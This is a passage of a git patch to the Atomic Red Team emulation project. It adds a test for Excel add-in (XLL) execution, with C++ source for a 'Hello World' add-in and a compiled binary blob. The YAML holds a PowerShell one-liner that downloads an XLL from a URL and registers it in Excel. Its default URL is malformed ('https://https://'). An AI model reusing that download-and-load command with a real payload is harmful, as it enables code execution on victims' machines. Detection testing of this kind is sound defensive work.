From d0e8a59a287e72ee82783f20cd8c201f8e3fb409 Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Fri, 6 Aug 2021 16:58:52 -0500
Subject: [PATCH] T1137 xll (#1592)

* upload xll and source

* T1137.006 yaml

* Update T1137.006.yaml

fix yaml error, swap out final url for xll

* cleaning directories

deleted the gitignore, added src and bin directories and moved the appropriate files there.  modified the xll url to include the bin directory

* remove extra comments

Co-authored-by: Brandon Morgan <bmorgan@nti.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1137.006/T1137.006.yaml              |  30 +++
 atomics/T1137.006/bin/HelloWorldXll.xll       | Bin 0 -> 10240 bytes
 atomics/T1137.006/src/COPYING                 |  12 ++
 atomics/T1137.006/src/HelloWorldXll.sln       |  28 +++
 .../src/HelloWorldXll/HelloWorldXll.cpp       |  21 ++
 .../src/HelloWorldXll/HelloWorldXll.def       |   2 +
 .../src/HelloWorldXll/HelloWorldXll.vcxproj   | 190 ++++++++++++++++++
 .../HelloWorldXll.vcxproj.filters             |  44 ++++
 .../T1137.006/src/HelloWorldXll/dllmain.cpp   |  19 ++
 .../T1137.006/src/HelloWorldXll/stdafx.cpp    |   8 +
 atomics/T1137.006/src/HelloWorldXll/stdafx.h  |  15 ++
 .../T1137.006/src/HelloWorldXll/targetver.h   |   8 +
 atomics/T1137.006/src/readme.md               |  70 +++++++
 13 files changed, 447 insertions(+)
 create mode 100644 atomics/T1137.006/T1137.006.yaml
 create mode 100644 atomics/T1137.006/bin/HelloWorldXll.xll
 create mode 100644 atomics/T1137.006/src/COPYING
 create mode 100644 atomics/T1137.006/src/HelloWorldXll.sln
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/stdafx.h
 create mode 100644 atomics/T1137.006/src/HelloWorldXll/targetver.h
 create mode 100644 atomics/T1137.006/src/readme.md

diff --git a/atomics/T1137.006/T1137.006.yaml b/atomics/T1137.006/T1137.006.yaml
new file mode 100644
index 00000000..628ece51
--- /dev/null
+++ b/atomics/T1137.006/T1137.006.yaml
@@ -0,0 +1,30 @@
+attack_technique: T1137.006
+display_name: 'Office Application Startup: Add-ins'
+
+atomic_tests:
+- name: Code Executed Via Excel Add-in File (Xll)
+  description: |
+    Downloads a XLL file and loads it using the excel add-ins library.
+    This causes excel to display the message "Hello World"
+    Source of XLL - https://github.com/edparcell/HelloWorldXll 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    xll_url:
+      description: url of the file HelloWorldXll.xll
+      type: url
+      default: 'https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true'
+
+    local_file:
+      description: name of the xll file 
+      type: path
+      default: '$env:tmp\HelloWorldXll.xll'
+
+  executor:
+    name: powershell
+    elevation_required: true 
+    command: |
+      powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+  
diff --git a/atomics/T1137.006/bin/HelloWorldXll.xll b/atomics/T1137.006/bin/HelloWorldXll.xll
new file mode 100644
index 0000000000000000000000000000000000000000..95d85d81d20c7286827b3ed391867e925dcb7d44
GIT binary patch
literal 10240
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
R%dXA4t}glw_4m&M{|hYk%2xmY

literal 0
HcmV?d00001

diff --git a/atomics/T1137.006/src/COPYING b/atomics/T1137.006/src/COPYING
new file mode 100644
index 00000000..cd20731c
--- /dev/null
+++ b/atomics/T1137.006/src/COPYING
@@ -0,0 +1,12 @@
+Copyright (c) 2015, Edward Parcell
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll.sln b/atomics/T1137.006/src/HelloWorldXll.sln
new file mode 100644
index 00000000..d86a261b
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.24720.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HelloWorldXll", "HelloWorldXll\HelloWorldXll.vcxproj", "{0A5476B7-2700-4B0C-A72C-3054B5064E96}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.ActiveCfg = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x64.Build.0 = Debug|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.ActiveCfg = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Debug|x86.Build.0 = Debug|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.ActiveCfg = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x64.Build.0 = Release|x64
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.ActiveCfg = Release|Win32
+		{0A5476B7-2700-4B0C-A72C-3054B5064E96}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
new file mode 100644
index 00000000..d6bc4bf6
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.cpp
@@ -0,0 +1,21 @@
+// HelloWorldXll.cpp : Defines the exported functions for the DLL application.
+//
+
+#include "stdafx.h"
+
+
+short __stdcall xlAutoOpen()
+{
+	char *text = "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
new file mode 100644
index 00000000..e1759e99
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.def
@@ -0,0 +1,2 @@
+EXPORTS
+	xlAutoOpen
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
new file mode 100644
index 00000000..2252a3a1
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj
@@ -0,0 +1,190 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0A5476B7-2700-4B0C-A72C-3054B5064E96}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>HelloWorldXll</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <TargetExt>.xll</TargetExt>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_WINDOWS;_USRDLL;HELLOWORLDXLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
